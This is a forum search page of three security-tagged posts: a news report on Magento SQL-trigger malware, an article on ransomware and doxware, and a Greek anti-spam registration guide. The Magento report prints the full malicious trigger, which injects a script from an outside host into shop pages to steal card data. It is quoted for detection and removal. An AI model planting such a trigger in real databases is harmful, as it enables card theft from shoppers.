Slate
Blackcurrant
Watermelon
Strawberry
Orange
Banana
Apple
Emerald
Chocolate
Marble
Slate
Blackcurrant
Watermelon
Strawberry
Orange
Banana
Apple
Emerald
Chocolate
Marble
Search the Community
Showing results for tags 'security'.
Found 3 results
-
Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database. Security experts have discovered a new strain of malware that is targeted websites raising Russian the Magento eCommerce platform. The novelty is that this is the first a malware that hides the code in the website’s database is completely written in SQL. The malware is triggered every time a user places a new order, the “SQL trigger” is then executed before the Magento platform even assembles the web page. The researchers Willem de Groot that first analyzed the SQL malware discovered by Jeroen Boersma explained that this is a significant evolution on the threat landscape. “The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot. “This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.” The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites. In order to discover the presence of the SQL malware, administrators have to inspect the database searching for suspicious SQL triggers such as containing admin, .js, script or < (html tags). echo 'SHOW TRIGGERS' | n98-magerun db:console Once discovered the malicious trigger it is possible to delete it with a command like the following one: echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console According to the expert, SQL malware attacks starts with a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop. Below the pattern discovered by Jeroen Boersma: TRIGGER `after_insert_order` AFTER INSERT ON `sales_flat_order` FOR EACH ROW BEGIN UPDATE core_config_data SET value = IF( value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', value, CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>') ) WHERE path='design/head/includes' OR path='design/footer/absolute_footer' OR path='design/footer/copyright';\ UPDATE cms_block SET content= IF( content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', content, CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>') ); END; de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware. http://securityaffairs.co/wordpress/56373/malware/sql-malware.html
-
The evolution of extortionware https://techtalk.gfi.com/the-evolution-of-extortionware/ Debra Littlejohn Shinder on February 7, 2017 We’ve all heard a lot about ransomware that makes data inaccessible and/or locks up the computer or device until you pay for the encryption key. Now we’re seeing a variant on that theme that some call doxware, or extortionware, that goes further and threatens to release copies of the private documents, photos, and email messages on your computer to the public if you don’t pay up. It’s just one example of how malware has evolved over the past few years and is becoming more and more aggressive. Ransomware gets its name from the fact that it holds some or all of your files hostage and demands payment to release them. This particularly heinous type of malware has been around at least since the 1980s, when the incarnation known as AIDS appeared. Various ransomware Trojans have cropped up over the years, but really ramped up a few years ago as Bitcoin offered the opportunity for attackers to easily collect the money without going through traditional channels. CryptoLocker is one of the best-known examples of ransomware. The original version sprang to life in 2013, distributed via a botnet and malicious email attachments. The next year, the botnet was taken down by a consortium of law enforcement agencies, software vendors, commercial security research companies and academic security research departments at several prominent universities, in Operation Tovar. Not only was the botnet dismantled, but the private keys used to encrypt victims’ files were seized and made available, so that particular story had a happy ending. Unfortunately, it was far from the end of ransomware, and new extortionist malware programs have “borrowed” the CryptoLocker name even though they aren’t technically variants of it. Other well-known ransomware attacks include Cryptowall and Reveton for Windows, and KeeRanger on Mac OS X. Then there’s a whole other category of ransomware that targets smartphone and tablet operating systems. Extortionware goes mobile Many people today, especially young people, rarely use desktop or even laptop computers. That doesn’t mean they’ve sworn off the Internet; to the contrary, they’re online all the time, but they do it using mobile devices. So it’s no wonder the ransomware authors have turned their attention to creating malicious code that targets those devices. As mentioned in the introduction, there are basically two types of ransomware: Those that encrypt your data so you can’t view or use it, called (appropriately enough)encrypting ransomware Those that prevent you from logging onto the computer or device or from using one or more applications (such as your web browser), called blocking ransomware or just blockers. Note: There is also a variety of scamware called “scareware” that doesn’t really do anything but only threatens to; this includes those email messages that tell you the FBI has found something illegal on your computer and will arrest you if you don’t send money for the “fine.” Encrypting ransomware is the most popular on desktop operating systems, but they don’t work as well with mobile devices because the data is usually stored in the cloud instead of (or in addition to) on the device where the malware can hijack it. Thus a majority of mobile ransomware programs are blockers. Popular mobile ransomware blockers include Small, Fusob, Pletor and Svpeng. Small and Fusob combine the “threatware” idea with screen overlays that prevent you from using the apps on your device. Mobile ransomware is often disguised as a legitimate third party app or game, installed as a “drive-by download” from questionable websites, or through links in text messages. Doxware takes electronic extortion to a new level Doxing is a relatively new term that refers to the public release of private information about an individual or organization. Doxware does (or threatens to do) exactly the opposite of what traditional ransomware does; instead of locking up your sensitive “docs” and making them inaccessible to you, it makes them accessible to everybody – unless you pay up. If encrypting and blocking extortionware is analogous to hostage-taking for ransom, doxware is comparable to the blackmailer who demands money to keep your secrets quiet. For this reason, doxware is sometimes also called leakware. Doxware often targets email and word processing files. Mobile variants could release private messages, pictures or contact lists from users’ phones. Doxware can be more effective than ransomware at invoking a positive (from the attacker’s point of view) response because victims can circumvent regular ransomware encryption by maintaining separate backups of data, or get past blockers by formatting the hard drive and doing a clean restore. However, once an attacker has information that you don’t want made public, there is little you can do to prevent that other than pay up. The scope of the problem Even though it’s been with us for a long time, the proliferation of extortionware has exploded over the last few years, and some have dubbed 2016 “the year of ransomware” as both the distribution and the code itself became more sophisticated and touched more and more computer and device users. I’ve never had to deal with extortionware on my own systems (thanks in part to careful security practices and in part to good luck) but I have a number of friends and relatives from all walks of life, including a few in the IT industry, who have fallen victim to it. Both individual users and businesses are vulnerable. An Osterman Research survey in 2016 showed that nearly half of respondents said their organizations that been the victim of a ransomware attack during the previous 12 months. CNN statistics showed $209 million paid to ransomware attackers in the first quarter of 2016, and FBI estimates indicated a likely ransomware loss of $1 billion or more for the year. In addition, the average ransomware demand increased from $294 in 2015 to $679 in 2016. While that $679 average might not seem like much, smaller amounts extorted from individuals are balanced by much larger ransoms targeting organizations, such as the $3.4 million that cybercriminals demanded from Hollywood Presbyterian hospital in early 2016. Protecting against extortionware Obviously extortionware is a big threat and should be on your security radar. So how do you protect your organization from it? As you might guess, many of the recommended measures are the same used to protect against other types of malware: Keep your OS and applications updated and install all security patches Back up important files regularly to a site that is disconnected when not backing up (to prevent ransomware from also encrypting your backup files) Authenticate inbound email Implement ad blocking on web browsers since malware is often delivered through “malvertisements,” even on legitimate sites Disable unneeded services (CryptoLocker, for example, often targeted machines using Remote Desktop Protocol, so disabling RDP if you don’t use it helps protect against it) Educate users in safe computing practices and reinforce the importance on a regular basis: Don’t click on links in email, texts, and on web sites you don’t trust Show hidden file extensions so executables can’t be disguised as PDFs or JPGs or other more innocuous file types Don’t visit questionable web sites (porn, warez, music piracy sites, hacker forums, etc.) Don’t download mobile apps from untrusted sources Several of the popular security vendors offer security suites to protect against malware, including extortionware. They also offer mobile security solutions that are designed to scan your phone or tablet and check apps against their databases of known threats, and can also warn you of websites that are infected with ransomware (or other malware). Most experts recommend that you not pay the ransom as this encourages the criminals – and in many cases victims have paid and never received the keys, or received keys that didn’t work. Remember that criminals, by definition, are not trustworthy and are prone to not keeping their promises. Summary Extortionware is big business and becoming more so. Companies and other large organizations are prime targets because they’re seen as having deep pockets.
-
- ransomware
- extortionware
-
(and 1 more)
Tagged with:
-
ΚαλησπέραΠάμε να δούμε πως μπορείτε να προσθέσετε στην εγγραφή μια ερώτηση οπού θα πρέπει ο χρηστής να απαντήσει σωστά έτσι ώστε να ολοκληρωθεί η εγγραφή του.Αυτό μπορεί να βοηθήσει για να καταπολεμήσετε τους spammers.Πηγαίνετε ACP-Question & Answer Challenge και πατήστε στο Add New Question η στο Create one nowΕικόναΌταν πατήσετε σας βγάζει να συμπληρώσετε 2 πεδία στο Question γράφετε την ερώτηση που θα λέει πχ. Ποσό κάνει 8+8;Και από κάτω στο Valid answers. One per line. Γράφετε την απάντηση που θα πρέπει να δώσει ο χρηστής έτσι ώστε να ολοκληρωθεί η εγγραφή του.Καλύτερα να προσθέσετε παραπάνω από 1 επιλογή δηλαδή στην παραπάνω ερώτηση μπορεί εσείς για απάντηση να έχετε γράψει 16 και ο χρήστης να γράψει Δεκαέξι και να του το βγάζει λάθος, γιαυτό θα γράφεται όλες της πιθανές επιλογές.Π.χ16δεκαέξιΔεκαέξιΔΕΚΑΕΞΙΔεκαεξιδεκαεξιΈτσι ώστε να το μετρήσει σαν σωστό, γιατί σχεδόν πολλά άτομα δεν βάζουν τόνους, η μπορεί να ξεκινήσουν με μικρά κ.τ.λ.Για να το κάνετε αυτό στο πεδίοValid answers. One per line.Γράφετε όλα αυτά που θέλετε το ένα κάτω από το άλλο, και πατάτε στο Edit Question